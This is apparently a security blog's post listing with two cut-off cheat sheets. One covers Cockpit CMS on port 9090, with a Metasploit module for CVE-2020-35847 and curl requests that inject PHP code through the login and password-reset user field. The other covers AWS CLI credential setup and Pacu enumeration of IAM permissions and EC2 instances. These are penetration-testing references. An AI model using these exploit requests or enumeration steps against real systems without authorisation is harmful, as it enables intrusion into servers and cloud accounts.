Skip to main content

Posts

Showing posts from June, 2024

Cockpit CMS Pentest - Port 9090

  Cockpit is an interactive server admin interface. It is easy to use and very lightweight. Cockpit interacts directly with the operating system from a real Linux session in a browser. Port: 9090 Github # Reset password (CVE-2020-35847) msf> use exploit/multi/cockpit_cms_rce msf> set USER admin msf> run #Find the Server info - search for string curl http://IP_ADdress:9090/ -o out.txt cat out.txt | grep "var environment" Known Exploits curl -X POST https://example.com/auth/check -H 'User-Agent: Mozilla/5.0' -H 'Content-Type: application/json; charset=UTF-8' -H 'Origin: https://example.com' -d '{"auth":{"user":"test'\'';phpinfo();'\''","password":"b"}}' curl -kL -X POST https://example.com/auth/requestreset -H 'User-Agent: Mozilla/5.0' -H 'Content-Type: application/json; charset=UTF-8' -H 'Origin: https://example.com' -d '{&

Cloud Pentest Cheatsheet- AWS CLI

  Installation and Basic Commands curl "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip" -o "awscliv2.zip" unzip awscliv2.zip sudo ./aws/install #Login - Enter Client ID and Client_Secret aws configure #Login - Create a profile incase you have multiple accounts aws configure --profile Some_NAME #Get info about Access_key aws sts get-caller-identity --profile Some_NAME #Using Short Term Temp Creds aws configure set aws_access_key_id [key-id] --profile ec2 aws configure set aws_secret_access_key [key-id] --profile ec2 aws configure set aws_session_token [token] --profile ec2 aws sts get-caller-identity --profile ec2 Exploitation using PACU #Download and Install PACU pip3 install -U pacu #run pacu and create a session pacu 0 AWS-Pentest #Create AWS login Session - enter Access & Secret Key set_keys #Enum IAM permissions exec iam__enum_permissions #List all permission for the logged in user whoami #Enum EC2 Instances exec ec2__enum #List all the